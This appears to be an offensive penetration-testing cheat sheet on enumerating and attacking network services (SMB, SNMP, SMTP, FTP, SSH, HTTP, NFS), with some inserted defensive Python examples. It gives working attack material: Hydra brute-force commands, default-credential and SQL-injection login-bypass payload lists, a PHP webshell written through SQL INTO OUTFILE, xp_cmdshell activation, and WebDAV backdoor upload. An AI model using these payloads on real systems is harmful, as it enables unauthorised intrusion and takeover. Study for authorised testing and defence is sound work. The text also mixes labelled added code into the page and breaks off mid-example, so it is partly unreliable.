4. Enumeration
After finding a vulnerability you will exploit it by enumeration. Enumeration is the process of extracting user names, machine names, network resources, shares and services from a system. In this phase the attacker creates an active connection to the system and performs directed queries to gain more information about the target. The gathered information is used to identify vulnerabilities or weak points in the system's security, which are then exploited in the system-gaining phase.
Types of information enumerated by intruders:
Network Resource and shares
Users and Groups
Routing tables
Auditing and Service settings
Machine names
Applications and banners
SNMP and DNS details
Techniques for Enumeration
Extracting user names using email ID's
Extract information using the default password
Brute Force Active Directory
Extract user names using SNMP
Extract user groups from Windows
Extract information using DNS Zone transfer
Services and Port to Enumerate
TCP 53: DNS Zone transfer
TCP 135: Microsoft RPC Endpoint Mapper
TCP 137: NetBIOS Name Service
TCP 139: NetBIOS session Service (SMB over NetBIOS)
TCP 445: SMB over TCP (Direct Host)
UDP 161: SNMP
TCP/UDP 389: LDAP
TCP/UDP 3368: Global Catalog Service
TCP 25: Simple Mail Transfer Protocol (SMTP)
NetBIOS Enumeration
NetBIOS stands for Network Basic Input Output System. It allows computers to communicate over a LAN and to share files and printers.
NetBIOS names are used to identify network devices over TCP/IP (Windows). A name must be unique on the network and is limited to 16 characters: 15 characters are used for the device name and the 16th is reserved for identifying the type of service running or the name record type.
Attackers use NetBIOS enumeration to obtain:
List of computers that belong to a domain
List of shares on the individual hosts on the network
Policies and passwords
Commands and tools used:
Nbtstat: utility used to find protocol statistics, NetBIOS name table and name cache details
Superscan: GUI tool used to enumerate Windows machines
Net view: command line tool to identify shared resources on a network
SNMP Enumeration
SNMP (Simple Network Management Protocol) is an application layer protocol that uses UDP to maintain and manage routers, hubs, switches and other network devices on an IP network. SNMP is very commonly found enabled on a variety of operating systems such as Windows Server, Linux and UNIX servers, as well as on network devices like routers and switches.
SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system.
It consists of three major components:
Managed Device: A managed device is a device or a host (technically known as a node) which has the SNMP service enabled. These devices could be routers, switches, hubs, bridges, computers etc.
Agent: An agent can be thought of as a piece of software that runs on a managed device. Its primary job is to convert the device's information into an SNMP-compatible format so the network can be managed smoothly using SNMP.
Network Management System (NMS): The software systems used to monitor the network devices.
An agent running on every SNMP device provides access to a readable and writable database, referred to as the management information base (MIB). The MIB is organized hierarchically; it is a virtual database containing a formal description of all the network objects that can be managed using SNMP, each identified by a specific object identifier (OID). It is a giant repository of values and settings. A manager is also involved in the process: the manager queries the agent for various details.
A community string is a text string used to authenticate communications between management stations and the network devices on which SNMP agents are hosted. Community strings travel in clear text over the network and are therefore subject to sniffing. A community string is sent with every packet exchanged between the node and the management station.
Two types of community strings:
Read only: This mode permits querying the device and reading its information, but does not permit any kind of change to the configuration. The default community string for this mode is "public".
Read Write: In this mode, changes to the device are permitted; if one connects with this community string, one can even modify the remote device's configuration. The default community string for this mode is "private".
When the community strings are left at their default settings, attackers take the opportunity to find loopholes through them.
Few tools:
OpUtils Network Monitoring Toolset - http://www.manageengine.com
SolarWinds ( best SNMP enumeration tool) - www.solarwinds.com
command line tools: snmpwalk, snmp-check
Countermeasures:
Remove or disable SNMP agents on hosts
Block port 161 at all perimeter network access devices
Restrict access to specific IP addresses
Use SNMPv3 (more secure)
Implement the Group Policy security option called "Additional restrictions for anonymous connections"
Access to null session pipes, null session shares, and IPsec filtering should also be restricted
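The countermeasures above come down to three things that can be checked mechanically in a net-snmp configuration: no default community names, no read-write community over v1/v2c, and every community pinned to a source address (or better, SNMPv3 users only). The following checker is an added example, not code from the page; the snmpd.conf fragment it audits is constructed, and it assumes net-snmp's rocommunity/rwcommunity/rouser directive syntax.

```python
# Audit a net-snmp snmpd.conf for the weak settings the countermeasures warn
# about. The configuration fragment below is constructed for the example.

DEFAULT_COMMUNITIES = {"public", "private"}
COMMUNITY_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}
V3_USER_DIRECTIVES = {"rouser", "rwuser"}

# Constructed sample: two weak legacy lines, one restricted v2c line, one v3 user.
SAMPLE_CONF = """\
# legacy, as shipped by many images
rocommunity public
rwcommunity private
# v2c read-only string restricted to the monitoring subnet
rocommunity n3tm0n-r0 10.20.0.0/24
# SNMPv3 user that must authenticate and encrypt (auth+priv)
rouser nmsuser priv
"""


def parse_directives(conf_text):
    """Yield (line_no, directive, args) for every non-comment, non-empty line."""
    for n, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if line:
            parts = line.split()
            yield n, parts[0].lower(), parts[1:]


def audit_snmpd(conf_text):
    """Return (line_no, finding) tuples for v1/v2c community lines that use a
    default name, grant write access, or are not pinned to a source address."""
    findings = []
    for n, directive, args in parse_directives(conf_text):
        if directive not in COMMUNITY_DIRECTIVES:
            continue
        community = args[0] if args else ""
        source = args[1] if len(args) > 1 else "default"
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append((n, f"default community string '{community}'"))
        if directive.startswith("rw"):
            findings.append((n, "read-write community reachable over v1/v2c"))
        if source in ("default", "0.0.0.0/0", "::/0"):
            findings.append((n, "community accepted from any source address"))
    return findings


def v3_only(conf_text):
    """True when the config defines SNMPv3 users and no v1/v2c communities."""
    directives = [d for _, d, _ in parse_directives(conf_text)]
    has_v3 = any(d in V3_USER_DIRECTIVES for d in directives)
    has_community = any(d in COMMUNITY_DIRECTIVES for d in directives)
    return has_v3 and not has_community


if __name__ == "__main__":
    for line_no, finding in audit_snmpd(SAMPLE_CONF):
        print(f"line {line_no}: {finding}")
    print("SNMPv3 only:", v3_only(SAMPLE_CONF))
```

Run against the sample, the two legacy lines produce five findings and the v3-only check fails; dropping them and keeping only the rouser line is what "Use SNMPv3" means in practice.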
LDAP Enumeration
The Lightweight Directory Access Protocol is used to access directory listings within Active Directory or other directory services. A directory is usually compiled in a hierarchical, logical format, rather like the levels of management and employees in a company. LDAP tends to be tied into the Domain Name System to allow integrated quick lookups and fast resolution of queries. LDAP generally runs on port 389 and, like other protocols, conforms to a distinct set of rules (RFCs). It is possible to query the LDAP service, sometimes anonymously, to determine a great deal of information: valid usernames, addresses and departmental details that a tester could use in a brute force or social engineering attack.
Tools:
Jxplorer - http://www.jxplorer.org/
LDAP Admin Tool - http://www.ldapsoft.com
Countermeasures:
Use NTLM or Basic authentication to limit access to known users only.
By default, LDAP traffic is transmitted unsecured; use SSL technology to encrypt the traffic.
Select a username different from your email address and enable account lockout.
NTP Enumeration
The Network Time Protocol is used to synchronize time across your network, which is especially important when using directory services. A number of time servers exist throughout the world that can be used to keep systems synced with each other. NTP uses UDP port 123. Through NTP enumeration you can gather information such as the list of hosts connected to the NTP server, their IP addresses, system names, and the OSs running on client systems in the network. All of this information can be enumerated by querying the NTP server.
SMTP Enumeration
The Simple Mail Transfer Protocol is used to send email messages, as opposed to POP3 or IMAP, which can be used to both send and receive messages. SMTP relies on Mail Exchange (MX) servers, found via the Domain Name System, to direct mail; should no MX server be detected, SMTP falls back to the A record or, alternatively, SRV records. SMTP generally runs on port 25.
SMTP enumeration allows us to determine valid users on the SMTP server. This is done with the help of built-in SMTP commands:
VRFY - This command is used for validating users.
EXPN - This command tells the actual delivery address of aliases and mailing lists.
RCPT TO - It defines the recipients of the message.
Tool:
NestScanTools Pro
Countermeasures:
Configure the SMTP server to ignore email messages to unknown recipients.
Don't include information such as the mail relay systems in use, internal IP addresses or host information in server responses.
Disable open relay feature.
DNS Enumeration
DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration will yield usernames, computer names, and IP addresses of potential target systems. The list of DNS records provides an overview of the types of resource records (database records) stored in the zone files of the Domain Name System (DNS). DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses.
A DNS zone transfer is used to replicate DNS data across a number of DNS servers or to back up DNS files. A user or server performs a zone transfer request against a name server. If the name server allows zone transfers by an anonymous user, all the DNS names and IP addresses hosted by the name server are returned in human-readable ASCII text.
Tools:
nslookup
maltego
dnsenum
dnsrecon
Countermeasures:
Disable Zone transfer by untrusted hosts
Ensure that private hostnames are not referenced to IP addresses within the DNS zone files of publicly accessible DNS servers.
Use premium registration services.
Scanning
NMAP TCP quick
> sudo nmap -Pn -v -sS -sV -sC -oN tcp-quick.nmap IP
NMAP TCP Full
> sudo nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN tcp-full.nmap -sV IP
NMAP TCP - Repeat if extra ports found
> sudo nmap -Pn -v -sS -A -oN tcp-extra.nmap -p PORTS IP
NMAP UDP quick
> sudo nmap -Pn -v -sU -sV --top-ports=30 -oN udp-quick.nmap IP
NMAP UDP 1000
> sudo nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T4 -oN udp-1000.nmap IP
NMAP UDP - Repeat if extra ports found
> sudo nmap -Pn -sU -A -oN udp-extra.nmap -p PORTS IP
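The "repeat if extra ports found" steps above compare the quick and full scan results by eye. The script below is an added example, not part of the page: it parses the open-port lines of two -oN files, computes the ports the quick scan missed, and renders them as the -p value for the tcp-extra follow-up. Both scan outputs are constructed samples in nmap's normal output format.

```python
import re

# Constructed samples of nmap normal output (-oN) for a quick and a full TCP scan
# of the same host; the full scan found two ports the top-ports scan missed.
QUICK_SCAN = """\
# Nmap 7.94 scan initiated as: nmap -Pn -v -sS -sV -sC -oN tcp-quick.nmap 10.0.0.5
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 8.9p1 Ubuntu 3
80/tcp  open     http        Apache httpd 2.4.52
139/tcp filtered netbios-ssn
"""

FULL_SCAN = """\
Nmap scan report for 10.0.0.5
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 8.9p1 Ubuntu 3
80/tcp   open  http         Apache httpd 2.4.52
445/tcp  open  microsoft-ds
8080/tcp open  http-proxy
"""

# One port line: "PORT/PROTO STATE SERVICE [VERSION]"; only open and
# open|filtered (UDP) states are of interest for the follow-up scan.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>open(?:\|filtered)?)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)


def open_ports(nmap_text):
    """Map (port, proto) -> (state, service, version) for open lines."""
    found = {}
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            key = (int(m["port"]), m["proto"])
            found[key] = (m["state"], m["service"], (m["version"] or "").strip())
    return found


def extra_ports(quick_text, full_text):
    """Ports open in the full scan that the quick scan did not report, sorted."""
    quick = open_ports(quick_text)
    return sorted(p for p in open_ports(full_text) if p not in quick)


def port_arg(ports):
    """Render the result as the -p value for the tcp-extra follow-up scan."""
    return ",".join(str(port) for port, _proto in ports)


if __name__ == "__main__":
    extra = extra_ports(QUICK_SCAN, FULL_SCAN)
    print("extra ports:", extra)
    print("follow-up: sudo nmap -Pn -v -sS -A -oN tcp-extra.nmap -p", port_arg(extra), "10.0.0.5")
```

The same functions work for the UDP pair (udp-quick.nmap against udp-1000.nmap); the regex accepts the open|filtered state that UDP scans report, so those ports are carried into the follow-up as well.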
Enumeration
FTP - Port 21
Check for FTP version vulns
Check for Anonymous login
Check for Read access
Check for Web root or root directories of any other accessible service
Check for write access
SSH - Port 22
Check for SSH version vulns
Check for User enumeration if necessary
Check if host key was seen somewhere else
Check if it prompts for a password - means password login is allowed for some users
nmap -sV --script=ssh-hostkey -p22 IP
Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar, MSF (if port gets filtered, there's defense mechanisms - fail2ban)
Telnet - Port 23
Connect and check for service running
SMTP - Port 25
Check for SMTP vulns
Check version with HELO / EHLO
POP - PORT 110
Connect using telnet
user <username>
pass <pass>
LIST - to list emails
RETR <email number> - To retrieve emails
DNS - Port 53
Might indicate a domain controller on Windows
Check for zone transfer
Kerberos - Port 88
Indicates that it's a DC
Netbios - Port 139
> nmblookup -A IP
> nbtscan IP
> On older hosts this port serves SMB / SAMBA; scan by adding 'client min protocol = LANMAN1' to the GLOBAL section in /etc/samba/smb.conf or by using --option='client min protocol'=LANMAN1 with smbclient
RPC - PORT 135
> sudo nmap -sS -Pn -sV --script=rpcinfo.nse -p135 IP
> rpcinfo IP
> rpcclient -U "" -N [ip]
LDAP - Ports 389,636,3268,3269
> sudo nmap -sS -Pn -sV --script=ldap* -p389,636,3268,3269 IP
WEB - PORT 80 / 443
NMAP Web
> sudo nmap -Pn -sC -p80,443 IP
Checks
Browse the webapp
Check for usernames, keywords
Check Web server vulns
Check for Cgi's shellshock
Check Certificates for hostname
Check robots.txt
Check sitemap.xml
Check for known software - View source
Check for default credentials
Check for input validation - SQLi
Check for OS Command execution
Check for LFI / RFI
Dirb
> dirb IP
> dirb with -X extensions based on web technology, .php,.asp,.txt,.jsp
> dirb IP -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'
Gobuster
> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt
> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -k -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'
Nikto
> nikto -host IP
SMB - Ports
NMAP vuln scripts
> sudo nmap -Pn --script=smb-proto* -p139,445 IP
> sudo nmap -Pn --script=smb-os-discovery.nse -p139,445 IP
> sudo nmap -Pn --script=smb-enum* -p139,445 IP
> sudo nmap -Pn --script=smb-vuln* -p139,445 IP
> nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse IP
Check for Null logins
> nmap --script smb-enum-shares -p 139,445 IP
> smbclient -L \\\\ip\\ -N
> smbclient -m=SMB2 -L \\\\Hostname\\ -N
Connect to a share with Null session
> smbclient \\\\IP\\ADMIN$ -N
> smbmap -H IP
> smbmap -u DoesNotExists -H IP
> enum4linux -a IP
Check permissions on a connect share
> smb: \> showacls # enable acl listing
> smb: \> dir # list directories with acls
Mount share on local machine
> sudo mount -t cifs //10.10.10.134/SHARENAME ~/path/to/mount_directory
List share with credentials
> smbmap -u USERNAME -p PASSWORD -d DOMAIN.TLD -H <TARGET-IP>
Recursively list all files in share
> smbmap -R -H <TARGET-IP>
> smbmap -R Replication -H <TARGET-IP>
With smbclient (recurse downloads all files)
> smbclient //<TARGET-IP>/Replication
> smb: \> recurse ON
> smb: \> prompt OFF
> smb: \> mget *
Upload / Download specific files
> smbmap -H <TARGET-IP> --download 'Replication\active.htb\'
> smbmap -H <TARGET-IP> --upload test.txt SHARENAME/test.txt
NFS - Port 2049
> showmount -e IP
> mount -t nfs -o vers=3 10.1.1.1:/home/ ~/home
> mount -t nfs4 -o proto=tcp,port=2049 127.0.0.1:/srv/Share mountpoint
TFTPD - UDP 69
> tftp client to connect
> atftp is a better client
> Can be used to read system files, MSSQL password mdf file
Finding exploits
Search on EDB and searchsploit
Check each service on CVE details for RCE / LFI / RFI / SQLI issues
Google search with the service banner
NETWORK ENUMERATION
Network enum - Ports
A quick checklist for possible attack vectors through the different ports
TCP
21 - FTP
Checks
Check if you have anonymous access
Check if you can upload a file to trigger a webshell through the webapp
Check if you can download backup files to extract included passwords
Check the version of FTP for exploits
Commands
Login to ftp server (for anonymous access, use "anonymous":"anonymous")
ftp $ip
FTP specific nmap scan
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
Tip: Before starting scans, set a bash variable to the IP address you are scanning, like ip=10.11.1.1. Then the $ip value in the commands of this cheat sheet will be filled in automatically.
22 - SSH
Checks
Try easy username-password combinations
Check for username enumeration vulnerabilities
Check version for vulnerabilities
(Only when getting desperate) Try brute force with Hydra, Medusa, ...
Commands
Nmap scan
nmap -p 22000 -sV -Pn -T4 --script=ssh* $ip
Brute force
hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh
hydra -l gibson -P /tmp/alpha.txt -T 20 $ip ssh
Connect through found key
#make the key accessible only by the current user (ssh refuses keys with wider permissions)
chmod 0600 user.key
ssh user@$ip -i user.key
25 - SMTP
Checks
Check for user enumeration
Check version for exploits
Commands
nmap scan
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
user enumeration
#manual way
nc -nvv $ip 25
VRFY root
(exists if user is replied as "250 Georgia<Georgia@>")
(doesn't exist if user is replied as "551 user not local")
#automated way
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
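The VRFY/EXPN commands described in the SMTP Enumeration section and the manual check above leak accounts because the server answers differently for names that exist (250) and names that do not (551). The loopback simulation below is an added example, not code from the page or from any mail server: it plays both sides of the exchange, once with a leaky server and once with a hardened one that returns the non-committal 252 reply (RFC 5321 permits it) and disables EXPN. The user and alias tables are constructed.

```python
# Loopback simulation of the SMTP VRFY / EXPN exchange: server replies on one
# side, client-side interpretation on the other. Tables are constructed.

KNOWN_USERS = {
    "georgia": "Georgia <Georgia@example.test>",
    "root": "root <root@example.test>",
}
ALIASES = {"staff": ["Georgia <Georgia@example.test>", "root <root@example.test>"]}


def multiline_reply(code, lines):
    """Format an SMTP multi-line reply: 'code-' continuation lines, 'code ' last."""
    out = [f"{code}-{text}" for text in lines[:-1]]
    out.append(f"{code} {lines[-1]}")
    return "\r\n".join(out)


def server_reply(command, hardened):
    """Server side: reply to one command line. With hardened=True every VRFY
    gets the same 252 answer and EXPN is disabled, so nothing is disclosed."""
    verb, _, arg = command.strip().partition(" ")
    verb, arg = verb.upper(), arg.strip().lower()
    if verb == "VRFY":
        if hardened:
            return "252 2.5.2 Cannot VRFY user, but will accept message and attempt delivery"
        if arg in KNOWN_USERS:
            return f"250 {KNOWN_USERS[arg]}"
        return "551 5.1.1 User not local"
    if verb == "EXPN":
        if hardened:
            return "502 5.5.1 EXPN not implemented"
        if arg in ALIASES:
            return multiline_reply("250", ALIASES[arg])
        return "550 5.1.1 Alias not found"
    if verb == "QUIT":
        return "221 2.0.0 Bye"
    return "502 5.5.2 Command not implemented"


def reply_discloses(reply):
    """Client side: True/False when the reply confirms or denies the name,
    None when the server gives the same answer regardless of the name."""
    code = reply[:3]
    if code == "250":
        return True
    if code in ("550", "551"):
        return False
    return None


def confirmed_names(candidates, hardened):
    """Names the server confirms from a candidate list; empty once hardened."""
    return [n for n in candidates
            if reply_discloses(server_reply(f"VRFY {n}", hardened)) is True]


if __name__ == "__main__":
    names = ["root", "georgia", "nobody"]
    for mode in (False, True):
        label = "hardened" if mode else "leaky"
        print(label, confirmed_names(names, mode))
        print("  EXPN staff ->", server_reply("EXPN staff", mode).replace("\r\n", " | "))
```

The point of the hardened branch is not the specific code but that the reply is identical for every name; an attacker can only distinguish accounts when the response differs, which is also why the countermeasure list says to strip relay and host details from server responses.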
80/443 - HTTP(S)
Checks
Login portals
try the default credentials off the application
try usernames already seen throughout the application or in other services like SMTP
try SQL injection bypasses
try registering a new user
brute force with hydra, medusa, ...
Check robots.txt for hidden directories
Brute force directories to find hidden content
Check for passwords/URLs/versions/... in comments of web app
Check version numbers for known exploits
Check changelog for version information
Estimate version based on copyright date (if not automatically adjusted)
Check if specific CMS is used like WordPress and then use platform specific scanners
ways to RCE
check for file upload functionalities (if uploads are filtered, try alternative extensions)
execute commands through SQLi
Shellshock
command injection
trigger injected code through path traversal
Enumeration scans
Directory brute force
#start off with a general scan
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 50
#add extensions
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 100 -x php,txt,cgi,sh,pl,py -s "200,204,301,302,307,403,500"
nmap scan
nmap -sV -Pn --script=ssl-heartbleed,http-adobe-coldfusion-apsa1301.nse,http-apache-negotiation.nse,http-apache-server-status.nse,http-aspnet-debug.nse,http-auth-finder.nse,http-auth.nse,http-avaya-ipoffice-users.nse,http-awstatstotals-exec.nse,http-axis2-dir-traversal.nse,http-backup-finder.nse,http-barracuda-dir-traversal.nse,http-bigip-cookie.nse,http-brute.nse,http-cakephp-version.nse,http-cisco-anyconnect.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-cookie-flags.nse,http-cors.nse,http-cross-domain-policy.nse,http-csrf.nse,http-date.nse,http-default-accounts.nse,http-devframework.nse,http-dlink-backdoor.nse,http-dombased-xss.nse,http-domino-enum-passwords.nse,http-drupal-enum-users.nse,http-drupal-enum.nse,http-enum.nse,http-errors.nse,http-exif-spider.nse,http-feed.nse,http-fileupload-exploiter.nse,http-form-brute.nse,http-form-fuzzer.nse,http-frontpage-login.nse,http-git.nse,http-gitweb-projects-enum.nse,http-headers.nse,http-huawei-hg5xx-vuln.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-internal-ip-disclosure.nse,http-joomla-brute.nse,http-jsonp-detection.nse,http-litespeed-sourcecode-download.nse,http-ls.nse,http-majordomo2-dir-traversal.nse,http-mcmp.nse,http-method-tamper.nse,http-methods.nse,http-mobileversion-checker.nse,http-ntlm-info.nse,http-open-redirect.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-proxy-brute.nse,http-put.nse,http-qnap-nas-info.nse,http-rfi-spider.nse,http-robots.txt.nse,http-security-headers.nse,http-server-header.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-svn-enum.nse,http-svn-info.nse,http-title.nse,http-tplink-dir-traversal.nse,http-trace.nse,http-traceroute.nse,http-trane-info.nse,http-unsafe-output-escaping.nse,http-useragent-tester.nse,http-userdir-enum.nse,http-vhosts.nse,http-vlcstreamer-ls.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,http-vuln-wnr1000-creds.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse -p 80 $ip
webdav scanning
davtest --url http://$ip
davtest -move -sendbd auto -url http://$ip:8080/webdav/
cadaver http://$ip:8080/webdav/
Nikto scans
nikto -host $ip | tee nikto.log
Login portals
brute force login portals
#basic auth
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
#login form
hydra -L users.txt -P users.txt $ip http-post-form "<directory>:login_username=^USER^&secretkey=^PASS^&<rest of post request>:<error message>"
#create custom password list
cewl -w cewl_passlist.txt -d 5 10.11.1.39/otrs/index.pl
Standard credentials you should try when being blocked by login portal
admin:admin
admin:password
admin:administrator
admin:(name of box)
user:user
user:password
user:12345
guest:guest
root:root
(name of box):(name of box)
(default account):(name of application)
Try SQL injections to bypass the login form
' or 1=1;--
' or '1'='1
' or 1=1;#
') or ('x'='x
' or <column> like '%';--
' or 1=1 LIMIT 1;--
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' or 1/*
*/ =1 --
admin' or 'a'='a
'#
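Every payload in the list above works for the same reason: the login query is assembled as text, so a quote in the input closes the string literal and the rest of the input becomes SQL. The snippet below is an added example, not from the page: it runs a string-built login check and a parameterized one against a constructed in-memory SQLite table (one account, assumed credentials) so the difference can be observed with the page's own payloads.

```python
import sqlite3

# Vulnerable and parameterized login checks side by side. The users table and
# the admin credentials are constructed for this example.


def make_db():
    """In-memory users table with a single constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query text built from input: a quote and a comment marker in the input
    rewrite the WHERE clause, so "admin' --" or "' or 1=1--" authenticate."""
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return False  # payloads that break the syntax simply fail


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the values as data, so the same
    payloads are compared literally against the stored strings and fail."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def bypass_results(username, password):
    """(login succeeded on vulnerable code, login succeeded on safe code)."""
    conn = make_db()
    return login_vulnerable(conn, username, password), login_safe(conn, username, password)


if __name__ == "__main__":
    for creds in (("admin", "S3cret!"), ("admin' --", "x"),
                  ("x", "' or 1=1--"), ("x", "' or '1'='1")):
        print(creds, "->", bypass_results(*creds))
```

SQLite treats `--` as a comment but not `#`, which is why the `#` variants from the list fail here while they would succeed against MySQL; the parameterized version is unaffected either way.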
File upload
Try alternative extensions for file uploads
Php > upload as pHp / phP / test.php.jpg /
php - phtml, .php, .php3, .php4, .php5, and .inc
asp - asp, .aspx
perl - .pl, .pm, .cgi, .lib
jsp - .jsp, .jspx, .jsw, .jsv, and .jspf
Coldfusion - .cfm, .cfml, .cfc, .dbm
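The extension variants above (case changes, double extensions, the alternative extensions per language) all defeat a filter that only looks at the last extension or compares case-sensitively. The validator below is an added example, not from the page: it allow-lists the final extension, rejects any executable extension in any position, normalises case, and stores the file under a server-generated name. The allow-list and the executable-extension set are assumptions for the example, the latter taken from the page's list.

```python
import os
import uuid

# Server-side upload-name validation against the extension tricks listed above.
# Both extension sets are assumptions for this example.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
EXECUTABLE_EXTENSIONS = {
    "php", "phtml", "php3", "php4", "php5", "inc",
    "asp", "aspx",
    "pl", "pm", "cgi", "lib",
    "jsp", "jspx", "jsw", "jsv", "jspf",
    "cfm", "cfml", "cfc", "dbm",
}


def is_safe_upload(filename):
    """Accept only names whose final extension is allow-listed and whose other
    segments carry no executable extension. Comparison is case-insensitive, so
    pHp, test.php.jpg and shell.jpg.php are all rejected."""
    if "\x00" in filename:                 # null-byte truncation trick
        return False
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):   # empty name or dotfile (.htaccess)
        return False
    segments = base.lower().split(".")
    if len(segments) < 2 or not segments[0]:
        return False
    extensions = segments[1:]
    if extensions[-1] not in ALLOWED_EXTENSIONS:
        return False
    return not any(ext in EXECUTABLE_EXTENSIONS for ext in extensions)


def stored_name(filename):
    """Name to store the file under: a random id plus the validated extension,
    so the client-supplied name never reaches the filesystem."""
    if not is_safe_upload(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{uuid.uuid4().hex}.{ext}"


if __name__ == "__main__":
    for name in ("photo.jpg", "shell.pHp", "test.php.jpg", "shell.jpg.php", ".htaccess"):
        print(f"{name!r}: {'accepted' if is_safe_upload(name) else 'rejected'}")
```

Extension checks are necessary but not sufficient: the upload directory should also be served without script execution and, where possible, the content type verified from the bytes rather than the name.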
File traversal list
Path Traversal Cheat Sheet: Windows (GracefulSecurity) - gracefulsecurity.com
RCE through SQLi
#Through file creation
union all select "<?php echo shell_exec($_GET['cmd']);?>",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
#if running as database admin, use xp_cmdshell
http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
'; exec master.dbo.xp_cmdshell 'command'
#On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1;--
RECONFIGURE;--
EXEC sp_configure 'xp_cmdshell', 1;--
RECONFIGURE;--
#On MSSQL 2000:
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
If you use exploits for web apps but they don't work as expected, proxy the traffic through Burp and inspect the requests actually sent.
110 - POP3
Checks
Check version for exploits
Check mails for the presence of credentials
Commands
manually login to the application
#connect and check for banner
telnet $ip 110
#guess login credentials
USER pelle
PASS admin
#list all emails
list
#retrieve email number 5 for example
retr 5
111 - NFS/RPC
Checks
Check for passwords in files on mountable drives
Commands
#check general rpc info
rpcinfo $ip
#Check what shares you can mount
showmount -e $ip
#mounting the share
#make the directory
mkdir /mnt/share
#mount the share
mount -t nfs -o nolock $ip:/share /mnt/share
Keep mountable shares in mind as they might be used in root squashing attacks to elevate your privileges to root.
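Root squashing is an export-side setting, so the defensive check is on the server's /etc/exports: an export with no_root_squash lets a remote root keep uid 0 on the share, and a wildcard client lets anyone mount it. The parser below is an added example, not from the page; the exports file it audits is constructed, and it assumes the exportfs syntax of path followed by client(options) entries.

```python
# Parse /etc/exports and flag the settings behind the root-squashing warning.
# The exports file below is constructed for this example.

# Constructed sample: one world-mountable export with root squashing disabled,
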